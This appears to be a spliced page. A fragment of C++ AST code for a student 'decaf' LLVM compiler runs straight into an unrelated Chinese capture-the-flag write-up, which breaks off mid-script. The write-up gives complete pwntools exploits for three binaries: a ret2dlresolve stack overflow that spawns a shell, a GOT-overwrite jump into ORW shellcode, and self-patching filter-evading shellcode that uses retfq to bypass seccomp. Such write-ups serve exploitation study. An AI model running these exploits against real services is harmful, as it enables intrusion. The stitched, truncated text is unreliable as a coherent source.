/// Block statement: a list of variable declarations followed by statements.
/// Owns both child lists and deletes them on destruction.
class decafBlock : public decafStmt {
    string BloKind;                // label printed as the node name in str()
    decafVarList *FieldDeclList;   // declarations, may be NULL
    decafStmts *StateDeclList;     // statements, may be NULL
public:
    decafBlock(string blokind, decafVarList *fieldlist, decafStmts *methodlist)
        : BloKind(blokind), FieldDeclList(fieldlist), StateDeclList(methodlist)
    {
        kind = dblo;
    }

    ~decafBlock() {
        // delete on a null pointer is a no-op, so no explicit guard is needed.
        delete FieldDeclList;
        delete StateDeclList;
    }

    /// Render as <BloKind>(<declarations>,<statements>).
    string str() {
        string out(BloKind);
        out += "(";
        out += getString(FieldDeclList);
        out += ",";
        out += getString(StateDeclList);
        out += ")";
        return out;
    }

    // Defined out of line.
    llvm::Value *Codegen();
};

class decafFuncDef : public decafAST {
string Name;
string Type;
decafPara * Para;
decafBlock * Block;
public:
llvm::Type *lType;
llvm::Function *lfunc;
void put_para(decafPara * Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(decafType* type){
this->Type = type->get_type();
this->lType = type->lType;
}
void put_block(decafBlock *Block){ this->Block = Block; }
decafBlock *get_block(){ return this->Block; }
decafPara *get_para(){ return this->Para; }
string get_name(){ return this->Name; }
string str() {
return string("Method") + "(" + Name + "," + Type + "," + getString(Para) + "," + getString(Block) + ")";
}
llvm::Value *Codegen();
};

class decafFuncDefList : public decafAST {
list<decafFuncDef*> List;
public:
list<decafFuncDef*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafFuncDef *e) { List.push_front(e); }
void push_back(decafFuncDef *e) { List.push_back(e); }
void cat_front(decafFuncDefList* List) {
list<decafFuncDef*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(decafType* Type){
for(auto e:this->List){
e->put_type(Type);
}
}
string str() {return commaList<class decafFuncDef *>(List);}
llvm::Value *Codegen() {
return listCodegen<decafFuncDef *>(List);
}
};

class decafEXFuncDef : public decafAST {
string Name;
string Type;
decafPara* Para;
public:
llvm::Type *lType;
llvm::Function *lfunc;
void put_para(decafPara* Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(decafType* type){
this->Type = type->get_type();
this->lType = type->lType;
}
string get_name(){return this->Name; }
string get_type(){return this->Type; }
decafPara* get_para(){ return this->Para; }
string str() {
return string("ExternFunction") + "(" + Name + "," + Type + "," + getString(Para) + ")";
}
llvm::Value *Codegen();
};

class decafEXFuncDefList : public decafAST {
list<decafEXFuncDef*> List;
public:
list<decafEXFuncDef*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafEXFuncDef *e) { List.push_front(e); }
void push_back(decafEXFuncDef *e) { List.push_back(e); }
void cat_front(decafEXFuncDefList* List) {
list<decafEXFuncDef*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(decafType* Type){
for(auto e:this->List){
e->put_type(Type);
}
}
string str() {return commaList<class decafEXFuncDef *>(List);}
llvm::Value *Codegen() {
return listCodegen<decafEXFuncDef *>(List);
}
};

/// Package node: a name, its field declarations and its method definitions.
/// Owns both child lists and deletes them on destruction.
class PackageAST : public decafAST {
    string Name;                       // package name, also used as the module identifier
    decafVarList *FieldDeclList;       // may be NULL
    decafFuncDefList *MethodDeclList;  // may be NULL
public:
    PackageAST(string name, decafVarList *fieldlist, decafFuncDefList *methodlist)
        : Name(name), FieldDeclList(fieldlist), MethodDeclList(methodlist)
    {
    }

    ~PackageAST() {
        // delete on a null pointer is a no-op, so no explicit guard is needed.
        delete FieldDeclList;
        delete MethodDeclList;
    }

    /// Render as Package(name,fields,methods).
    string str() {
        string out("Package");
        out += "(";
        out += Name;
        out += ",";
        out += getString(FieldDeclList);
        out += ",";
        out += getString(MethodDeclList);
        out += ")";
        return out;
    }

    /// Name the module after the package, then emit fields followed by methods.
    /// Returns the value from the last list that was present, or NULL if neither is.
    llvm::Value *Codegen() {
        TheModule->setModuleIdentifier(llvm::StringRef(Name));

        llvm::Value *val = NULL;
        if (FieldDeclList != NULL)
            val = FieldDeclList->Codegen();
        if (MethodDeclList != NULL)
            val = MethodDeclList->Codegen();
        // Q: should we enter the class name into the symbol table?
        return val;
    }
};

/// If statement: condition, then-block and a second block.
class decafIF : public decafStmt {
    decafAllexp *Exp;     // condition expression
    decafBlock *Block;    // first block
    decafBlock *Block2;   // second block -- presumably the else branch; may be NULL (TODO confirm)
public:
    decafIF(decafAllexp *Exp, decafBlock *Block, decafBlock *Block2)
        : Exp(Exp), Block(Block), Block2(Block2)
    {
    }

    /// Render as IfStmt(cond,block,block2).
    string str() {
        string out("IfStmt");
        out += "(";
        out += getString(Exp);
        out += ",";
        out += getString(Block);
        out += ",";
        out += getString(Block2);
        out += ")";
        return out;
    }

    // Defined out of line.
    llvm::Value *Codegen();
};

/// While statement: a condition and a body block.
class decafWhile : public decafStmt {
    decafAllexp *Exp;    // loop condition
    decafBlock *Block;   // loop body
public:
    decafWhile(decafAllexp *Exp, decafBlock *Block)
        : Exp(Exp), Block(Block)
    {
    }

    /// Render as WhileStmt(cond,block).
    string str() {
        string out("WhileStmt");
        out += "(";
        out += getString(Exp);
        out += ",";
        out += getString(Block);
        out += ")";
        return out;
    }

    // Defined out of line.
    llvm::Value *Codegen();
};

/// For statement: two assignment lists, a condition and a body block.
class decafFor : public decafStmt {
    decafAllexp *Exp;         // loop condition
    decafBlock *Block;        // loop body
    decafAssignList *List;    // printed before the condition -- presumably the init list (TODO confirm)
    decafAssignList *List2;   // printed after the condition -- presumably the step list (TODO confirm)
public:
    decafFor(decafAllexp *Exp, decafBlock *Block, decafAssignList *List, decafAssignList *List2)
        : Exp(Exp), Block(Block), List(List), List2(List2)
    {
    }

    /// Render as ForStmt(list,cond,list2,block).
    string str() {
        string out("ForStmt");
        out += "(";
        out += getString(List);
        out += ",";
        out += getString(Exp);
        out += ",";
        out += getString(List2);
        out += ",";
        out += getString(Block);
        out += ")";
        return out;
    }

    // Defined out of line.
    llvm::Value *Codegen();
};

class decafReturn : public decafStmt {
decafBinexp * Exp;
public:
decafReturn(){
this->kind = dret;
}
decafReturn(decafBinexp * Exp){
this->Exp = Exp;
this->kind = dret;
}
decafBinexp* get_exp(){ return this->Exp; }
string str() { return string("ReturnStmt") + "(" + getString(Exp) + ")"; }
llvm::Value *Codegen();
};

// ProgramAST - root of a decaf program: extern declarations plus one package.
// Owns both children and deletes them on destruction.
class ProgramAST : public decafAST {
    decafEXFuncDefList *ExternList;  // may be NULL
    PackageAST *PackageDef;          // required by Codegen()
public:
    ProgramAST(decafEXFuncDefList *externs, PackageAST *c)
        : ExternList(externs), PackageDef(c)
    {
    }

    ~ProgramAST() {
        // delete on a null pointer is a no-op, so no explicit guard is needed.
        delete ExternList;
        delete PackageDef;
    }

    /// Render as Program(externs,package).
    string str() {
        string out("Program");
        out += "(";
        out += getString(ExternList);
        out += ",";
        out += getString(PackageDef);
        out += ")";
        return out;
    }

    /// Emit the externs (if any) first, then the package.
    /// Throws runtime_error when there is no package; otherwise returns the
    /// package's Codegen() result.
    llvm::Value *Codegen() {
        if (ExternList != NULL) {
            ExternList->Codegen();
        }
        if (PackageDef == NULL) {
            throw runtime_error("no package definition in decaf program");
        }
        return PackageDef->Codegen();
    }
};

最终拿到了满分:

1
2
3
Correct(dev): 100 / 100
Score(dev): 100.00
Total Score: 100.00

no_output

1
2
3
4
5
6
test: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=42055570bc1508252eacc21b95b83f8c002483eb, for GNU/Linux 3.2.0, stripped
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
  • 32位,dynamically,NX

漏洞分析

简单栈溢出

1
2
3
4
5
6
ssize_t read_s()
{
char buf[68]; // [esp+0h] [ebp-48h] BYREF

return read(0, buf, 0x100u); // 栈溢出
}

strcpy 会将字符串末尾置空,导致 fdg 被设置为“0”

1
strcpy(nameg, name);

入侵思路

利用 strcpy 的溢出覆盖 fdg 为“0”,通过第二次输入绕过程序的字符串匹配检查

接着就要考虑如何触发浮点异常信号 SIGFPE:

1
2
3
4
5
6
7
8
9
10
v2 = "give me the soul:";
__isoc99_scanf("%d", soul);
v2 = "give me the egg:";
__isoc99_scanf("%d", &egg);
if ( egg )
{
signal(8, (__sighandler_t)read_s);
soul[1] = soul[0] / egg;
signal(8, 0);
}

由于除号两边都是 int 类型,因此 -0x80000000/-1 就会触发 SIGFPE(数学上的结果 0x80000000 超出了 32 位有符号整数的表示范围,x86 的 idiv 指令在商溢出时会抛出除法异常)

由于没法泄露,因此只能打 ret2dlresolve

对于32位无 PIE 保护的程序,在 pwntools 中有比较成熟的 ret2dlresolve 工具,直接拿来用就好了

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# -*- coding:utf-8 -*-
from signal import pause
from pwn import *

# ---- target and pwntools configuration ----
arch = 32
challenge = './test'

context.os = 'linux'
context.log_level = 'debug'

if arch == 64:
    context.arch = 'amd64'
if arch == 32:
    context.arch = 'i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')
context.binary = elf

# ---- short aliases over the global tube `p` (looked up at call time) ----
rl = lambda a=False: p.recvline(a)
ru = lambda a, b=True: p.recvuntil(a, b)
rn = lambda x: p.recvn(x)
sn = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda a, b: p.sendafter(a, b)
sla = lambda a, b: p.sendlineafter(a, b)
irt = lambda: p.interactive()
dbg = lambda text=None: gdb.attach(p, text)
# Log "<expr> --> 0x<value>" in colour. `s` is evaluated with eval(), so only
# ever pass names written in this script. The ANSI escape needs the leading
# \033; the scraped text had lost it.
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak before unpacking. The fill byte must be exactly one
# byte long; the scraped b'x00' (three bytes) makes ljust() raise.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# ---- connect: local process or remote service ----
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')


def debug():
    """Attach gdb with a breakpoint at 0x8049268 and wait for the user."""
    #gdb.attach(p)
    gdb.attach(p, "b* 0x8049268")
    pause()


def cmd(op):
    """Answer the '>' menu prompt with the given option."""
    sla(">", str(op))

# Exploit body for the 32-bit "no_output" challenge (ret2dlresolve).
#debug()
# Answer the program's text prompts. Per the write-up, the strcpy overflow
# writes a NUL into fdg so that the later string check can be passed.
sl("\x00")
sleep(0.2)
p.send("a"*0x20)
sleep(0.2)
sl("hello_boy")
sleep(0.2)
# soul = INT_MIN, egg = -1: the division overflows and raises SIGFPE, whose
# handler is the vulnerable read_s().
sl("-2147483648")
sleep(0.2)
sl("-1")
sleep(0.2)

# NOTE(review): bss_addr is computed but never used below.
bss_addr = 0x804C080+0x200
rop = ROP(context.binary)
dlresolve = Ret2dlresolvePayload(elf,symbol="system",args=["/bin/sh"])

# Chain: read(0, data_addr) to plant the forged resolver structures, then
# resolve and call system("/bin/sh").
rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
print(rop.dump())

raw_rop = rop.chain()
# 76 = 0x48 bytes from buf up to ebp (buf is at ebp-0x48) + 4 bytes of saved ebp.
sl(flat([{76:raw_rop}]))
# Feeds the read() issued by the ROP chain.
sl(dlresolve.payload)

p.interactive()

orw

1
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11.3) stable release version 2.23, by Roland McGrath et al.
1
2
3
4
5
6
7
pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=02a3c09af5900983d07486d2b3310dffcebfde86, stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
  • 64位,dynamically,Partial RELRO,Canary,PIE
1
2
3
4
5
6
7
8
9
10
11
12
13
 line  CODE  JT   JF      K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x05 0xffffffff if (A != 0xffffffff) goto 0010
0005: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0009
0006: 0x15 0x02 0x00 0x00000001 if (A == write) goto 0009
0007: 0x15 0x01 0x00 0x00000002 if (A == open) goto 0009
0008: 0x15 0x00 0x01 0x0000003c if (A != exit) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
  • 白名单,只能打 ORW

漏洞分析

index 缺乏检查,导致 chunk_list 可以向上溢出:

1
2
3
4
5
6
chunk_list[index] = malloc(size);
if ( !chunk_list[index] )
{
puts("error");
exit(0);
}

入侵思路

程序的限制比较多:

  • add 可以执行2次,dele 可以执行1次
  • 每次输入的 size 大小不超过8字节,index 大小不超过1(可以为负数)

由于 index 可以为负数,可以尝试向上溢出,能够劫持的地方只有两处:GOT,IO_FILE

1
2
98:04c0│  0x564531002060 (malloc@got.plt) —▸ 0x7fa488599180 (malloc) ◂— push   rbp
99:04c8│ 0x564531002068 (setvbuf@got.plt) —▸ 0x7fa488584e80 (setvbuf) ◂— push rbp
1
2
a2:0510│  0x5645310020b0 —▸ 0x7fa4888d98e0 (_IO_2_1_stdin_) ◂— 0xfbad208b
a3:0518│  0x5645310020b8 ◂— 0x0

往 GOT 写入堆地址似乎没有什么用,劫持 IO_FILE 的话输入的字节数又太少

后来突然意识到一点:写入 GOT 的堆中数据可能会被执行(没有 NX),有些 wp 上也是利用这一点进行入侵

但经测试发现这些数据没有执行权限,vmmap 打印的 heap 段也没有显示x权限

1
2
3
pwndbg> vmmap 0x555555605160
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x555555605000 0x555555626000 rw-p 21000 0 [heap] +0x160

一番查找后得知:这与内核版本有关。较旧的内核在 ELF 没有启用 NX(栈可执行)时会自动设置 READ_IMPLIES_EXEC,使所有可读映射(包括堆)都带有执行权限;而较新的 x86-64 内核(Linux 5.8 起)不再自动设置该标志,此时只有栈可执行,因此即使程序关闭了 NX,堆仍然不会具有执行权限

接下来的思路就简单了,往 GOT 写入并执行8字节的指令,共有2次机会

其中最适合写指令的 GOT 表条目就是 atoi got

1
2
readn(nptr, 16LL);
return atoi(nptr);
1
2
0x555555400e29    call   atoi@plt                <atoi@plt>
nptr: 0x7fffffffdc20 ◂— 0x31 /* '1' */

因为栈也是有执行权限的,如果在 atoi got 中写入 jmp rdi 就可以劫持控制流到栈上,然后执行一个 sys_read 就可以写入 ORW 的 shellcode

由于 heap 权限的问题没有解决,我这里只能参考网上的 exp 大概写一下

非完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# -*- coding:utf-8 -*-
from pwn import *

# ---- target and pwntools configuration ----
arch = 64
challenge = './pwn1'

context.os = 'linux'
#context.log_level = 'debug'
if arch == 64:
    context.arch = 'amd64'
if arch == 32:
    context.arch = 'i386'

elf = ELF(challenge)
libc = ELF('libc-2.23.so')

# ---- short aliases over the global tube `p` (looked up at call time) ----
rl = lambda a=False: p.recvline(a)
ru = lambda a, b=True: p.recvuntil(a, b)
rn = lambda x: p.recvn(x)
sn = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda a, b: p.sendafter(a, b)
sla = lambda a, b: p.sendlineafter(a, b)
irt = lambda: p.interactive()
dbg = lambda text=None: gdb.attach(p, text)
# Log "<expr> --> 0x<value>" in colour. `s` is evaluated with eval(), so only
# ever pass names written in this script. The ANSI escape needs the leading
# \033; the scraped text had lost it.
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak before unpacking. The fill byte must be exactly one
# byte long; the scraped b'x00' (three bytes) makes ljust() raise.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# gdb script: preload the challenge libc, run, and break at the atoi call site.
c = "set exec-wrapper env 'LD_PRELOAD=./libc-2.23.so'\nrun\nb *$rebase(0xE29)\n"
local = 1
if local:
    #p = process(challenge)
    p = gdb.debug(challenge, c)
else:
    p = remote('119.13.105.35','10111')


def debug():
    """Attach gdb using the script in `c` and wait for the user."""
    #gdb.attach(p)
    gdb.attach(p, c)
    pause()


def cmd(op):
    """Answer the '>>' menu prompt.

    Bytes are sent unchanged so raw shellcode can be passed as the "option";
    anything else is stringified. On Python 3, str() of a bytes object would
    send its repr instead of the raw bytes.
    """
    sla(">>", op if isinstance(op, bytes) else str(op))


def add(index, size, data):
    """Menu option 1: allocate `size` bytes at slot `index` and fill in `data`.

    `index` may be an int or an already-formatted string such as "-14".
    """
    cmd(1)
    sla("index:", str(index) if isinstance(index, int) else index)
    sla("size:", str(size))
    sla("content:", data)


def dele(index):
    """Menu option 4: free the chunk at slot `index` (int or string)."""
    cmd(4)
    sla("index:", str(index) if isinstance(index, int) else index)

# Negative index: store the new chunk pointer above chunk_list. Per the
# write-up the intended target is the atoi GOT slot, so the next atoi(nptr)
# call runs the 8-byte chunk content `jmp rdi` and lands on the stack buffer.
add("-14",0x8,asm("jmp rdi"))

# open("flag") -> read(fd, rsp, 60) -> write(1, rsp, 60)
shellcode_open = shellcraft.pushstr("flag") + shellcraft.open("rsp")
shellcode_read = shellcraft.read("rax","rsp",60)
shellcode_write = shellcraft.write(1,"rsp",60)
# These print the length of the assembly source text, not of the assembled bytes.
print(len(shellcode_open))
print(len(shellcode_read))
print(len(shellcode_write))

# Small stager sent as the menu "option": read(0, rbp, 0x80) then jump to rbp.
shellcode_magic = asm("xor rax,rax;mov dl,0x80;mov rsi,rbp;push rax;pop rdi;syscall;jmp rbp")
# NOTE(review): cmd() calls str() on its argument; on Python 3 that sends the
# repr of the bytes object rather than the raw stager -- confirm the intended
# interpreter version.
cmd(shellcode_magic)

# Second stage, consumed by the stager's read().
p.send(asm(shellcode_open+shellcode_read+shellcode_write))

p.interactive()

shellcode

1
2
3
4
5
6
shellcode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,statically,NX
1
2
3
4
5
6
7
8
9
0000: 0x20 0x00 0x00 0x00000000  A = sys_number
0001: 0x15 0x06 0x00 0x00000005 if (A == fstat) goto 0008
0002: 0x15 0x05 0x00 0x00000025 if (A == alarm) goto 0008
0003: 0x15 0x03 0x00 0x00000004 if (A == stat) goto 0007
0004: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0008
0005: 0x15 0x02 0x00 0x00000009 if (A == mmap) goto 0008
0006: 0x15 0x01 0x00 0x000000e7 if (A == exit_group) goto 0008
0007: 0x06 0x00 0x00 0x00000000 return KILL
0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW
  • 白名单,要考虑 retfq 切换32位架构绕过 seccomp

漏洞分析

直接执行 shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
size = sys_read(0, shellcode, 0x1000uLL);
size2 = size;
if ( shellcode[(int)size - 1] == 0xA )
{
shellcode[(int)size - 1] = 0;
size2 = size - 1;
}
for ( i = 0; i < size2; ++i )
{
if ( shellcode[i] <= 0x1F || shellcode[i] == 0x7F )
goto LABEL_10;
}
((void (*)(void))shellcode)();
  • 现在 shellcode 的范围为 (0x1f,0x7f)

入侵思路

程序对输入的 shellcode 有检查,建议用 nasm 手动编写 shellcode

可以利用 shellcode 创造一个 sys_read 绕过 shellcode 的检查,但在实际构造的过程中遇到了很多问题,最大的问题就是无法直接使用 syscall(类似于 mov,add 之类的指令也会被过滤掉)

后来调试网上的 wp 发现了解决的办法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Two placeholder bytes: `push rdx` (0x52) and `pop rdx` (0x5a). Both pass the
# printable-byte filter and are patched at run time into `syscall` (0f 05):
# 0x52 ^ 0x5d == 0x0f and 0x5a ^ 0x5f == 0x05.
append = '''
push rdx
pop rdx
'''

# read(0, 0x40404040, 0x70) built only from filter-safe instructions. The two
# `xor byte ptr[rax+...],cl` lines patch the placeholder bytes that follow this
# stage (assumes rbx holds the shellcode base address -- TODO confirm).
shellcode_read = '''
/*read(0,0x40404040,0x70)*/
push 0x40404040
pop rsi
push 0x40
pop rax
xor al,0x40
push rax
pop rdi
xor al,0x40
push 0x70
pop rdx
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x57],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x58],cl
push rdx
pop rax
xor al,0x70
'''

# Stage followed by its placeholder, assembled as 64-bit code.
shellcode = ""
shellcode += shellcode_read
shellcode += append
shellcode = asm(shellcode,arch = 'amd64',os = 'linux')
  • 直接输入 syscall 会被检测出来,但通过 xor byte ptr[rax+offset],cl 就可以将后面的二进制代码给计算为 syscall
  • 对于这种会检查 shellcode 的程序来说,破解的关键点就是要利用合适的汇编指令来修改 shellcode 本身

利用这个技巧可以获取到 syscall,但由于程序没法泄露,因此先执行 sys_mmap 申请一段固定位置的缓冲区,然后执行 sys_read 将数据写入其中:

1
2
3
4
5
6
7
0x7f6fba0ee031    syscall  <SYS_mmap>
addr: 0x40404040
len: 0x7e
prot: 0x7
flags: 0x22
fd: 0x0 (pipe:[270462])
offset: 0x0
1
2
3
4
0x7f6fba0ee057    syscall  <SYS_read>
fd: 0x0 (pipe:[270462])
buf: 0x40404040 ◂— 0
nbytes: 0x70

最后的步骤就是 retfq 切换32位架构来绕过 seccomp 了

  • 指令 retfq 有两步操作:pop ip,pop cs(retf 是32位的 pop,retfq 是64位的 pop)
    • cs=0x23 程序以32位模式运行
    • cs=0x33 程序以64位模式运行

只要按照如下步骤编写 shellcode 就可以完成切换:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Filter-safe stage that ends in a run-time-patched `retfq` (48 cb). The
# placeholder bytes 0x52 0x5a that follow are rewritten in place:
#   0x52 ^ 0x72 ^ 0x68 == 0x48, and (0x5a - 0x47 - 0x48) & 0xff == 0xcb.
# The pushes leave 0x23 (32-bit code segment) and 0x40404040 (target address)
# on top of the stack for retfq to pop.
# Assumes rbx holds the shellcode base address -- TODO confirm.
shellcode_retfq = '''
push rbx
pop rax

xor al,0x40
push 0x72
pop rcx
xor byte ptr[rax+0x40],cl
push 0x68
pop rcx
xor byte ptr[rax+0x40],cl
push 0x47
pop rcx
sub byte ptr[rax+0x41],cl
push 0x48
pop rcx
sub byte ptr[rax+0x41],cl
push rdi
push rdi
push 0x23
push 0x40404040
pop rax
push rax
'''
  • 正常写入的 retfq 指令会被程序过滤,但还是可以通过 sub byte ptr[rax+offset],cl 进行调整

在绕过 seccomp 后还是会因为没有 write 而打印不出 flag,因此只能通过 cmp 汇编指令来逐字节比较内存中的 flag,把 flag 爆破出来(类似于 SCTF-gadget 的思路)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
# -*- coding:utf-8 -*-
from pwn import *

# ---- target and pwntools configuration ----
arch = 64
challenge = './shellcode'

context.os = 'linux'
#context.log_level = 'debug'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

# ---- short aliases over the global tube `p` (looked up at call time) ----
rl = lambda a=False: p.recvline(a)
ru = lambda a, b=True: p.recvuntil(a, b)
rn = lambda x: p.recvn(x)
sn = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda a, b: p.sendafter(a, b)
sla = lambda a, b: p.sendlineafter(a, b)
irt = lambda: p.interactive()
dbg = lambda text=None: gdb.attach(p, text)
# Log "<expr> --> 0x<value>" in colour. `s` is evaluated with eval(), so only
# ever pass names written in this script. The ANSI escape needs the leading
# \033; the scraped text had lost it.
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak before unpacking. The fill byte must be exactly one
# byte long; the scraped b'x00' (three bytes) makes ljust() raise.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))


def debug():
    """Attach gdb with a breakpoint at 0x40026D and wait for the user."""
    #gdb.attach(p)
    gdb.attach(p, "b *0x40026D\n")
    pause()


def cmd(op):
    """Answer the '>' menu prompt with the given option."""
    sla(">", str(op))

# Two placeholder bytes: `push rdx` (0x52) and `pop rdx` (0x5a). Both pass the
# printable-byte filter and are rewritten in place by the stage before them.
append = '''
push rdx
pop rdx
'''

# Stage 1: mmap(0x40404040, 0x7e, 7, 0x22, 0, 0) built only from filter-safe
# instructions. The two xor lines turn the following placeholder into
# `syscall` (0x52 ^ 0x5d == 0x0f, 0x5a ^ 0x5f == 0x05).
# Assumes rbx holds the shellcode base address -- TODO confirm.
# NOTE(review): flags (0x22) are loaded into rcx, whereas the syscall ABI takes
# the fourth argument in r10; the gdb trace in the write-up nevertheless shows
# flags=0x22 -- confirm how r10 gets its value.
shellcode_mmap = '''
/*mmap(0x40404040,0x7e,7,34,0,0)*/
push 0x40404040 /*set rdi*/
pop rdi
push 0x7e /*set rsi*/
pop rsi
push 0x40 /*set rdx*/
pop rax
xor al,0x47
push rax
pop rdx

push 0x40 /*set r8*/
pop rax
xor al,0x40
push rax
pop r8
push rax /*set r9*/
pop r9
/*syscall*/
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x31],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x32],cl
push 0x22 /*set rcx*/
pop rcx
push 0x40/*set rax*/
pop rax
xor al,0x49
'''

# Stage 2: read(0, 0x40404040, 0x70); same placeholder-patching trick at
# offsets 0x57/0x58.
shellcode_read = '''
/*read(0,0x40404040,0x70)*/
push 0x40404040
pop rsi
push 0x40
pop rax
xor al,0x40
push rax
pop rdi
xor al,0x40
push 0x70
pop rdx
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x57],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x58],cl
push rdx
pop rax
xor al,0x70
'''

# Stage 3: patch the last placeholder into `retfq` (48 cb):
#   0x52 ^ 0x72 ^ 0x68 == 0x48, and (0x5a - 0x47 - 0x48) & 0xff == 0xcb.
# The pushes leave 0x23 (32-bit code segment) and 0x40404040 (target address)
# on top of the stack for retfq to pop.
shellcode_retfq = '''
push rbx
pop rax

xor al,0x40
push 0x72
pop rcx
xor byte ptr[rax+0x40],cl
push 0x68
pop rcx
xor byte ptr[rax+0x40],cl
push 0x47
pop rcx
sub byte ptr[rax+0x41],cl
push 0x48
pop rcx
sub byte ptr[rax+0x41],cl
push rdi
push rdi
push 0x23
push 0x40404040
pop rax
push rax
'''

#debug()
# 32-bit stage: open("flag") via int 0x80. Kept at module level so the asm
# text stays byte-identical.
_SHELLCODE_X86 = '''
/*fp = open("flag")*/
mov esp,0x40404140
push 0x67616c66
push esp
pop ebx
xor ecx,ecx
mov eax,5
int 0x80
mov ecx,eax
'''

# 64-bit stage: retfq back to cs=0x33, then read(fp, rsp, 0x70). The
# per-guess compare is appended by pwn().
_SHELLCODE_FLAG = '''
push 0x33
push 0x40404089
retfq
/*read(fp,buf,0x70)*/
mov rdi,rcx
mov rsi,rsp
mov rdx,0x70
xor rax,rax
syscall
'''


def pwn(p, index, ch):
    """Test one guess: does flag[index] equal byte value `ch`?

    Sends the filter-safe first stage (mmap + read + retfq) and then the
    unrestricted second stage, which opens and reads the flag and compares one
    byte. On a match the shellcode spins forever; otherwise it executes `ret`.
    The caller tells the two apart by timing.

    Args:
        p: tube connected to a fresh instance of the challenge.
        index: offset of the flag byte to test.
        ch: candidate byte value.
    """
    stage1 = ""
    stage1 += shellcode_mmap
    stage1 += append
    stage1 += shellcode_read
    stage1 += append
    stage1 += shellcode_retfq
    stage1 += append
    stage1 = asm(stage1, arch='amd64', os='linux')

    # Use the tube that was passed in; the original sent through the global
    # `p` and ignored its own parameter.
    p.sendline(stage1)
    sleep(0.3)

    # `jz $-N` jumps back onto the cmp itself: the cmp encodes in 3 bytes with
    # no displacement and 4 bytes with an 8-bit displacement.
    if index == 0:
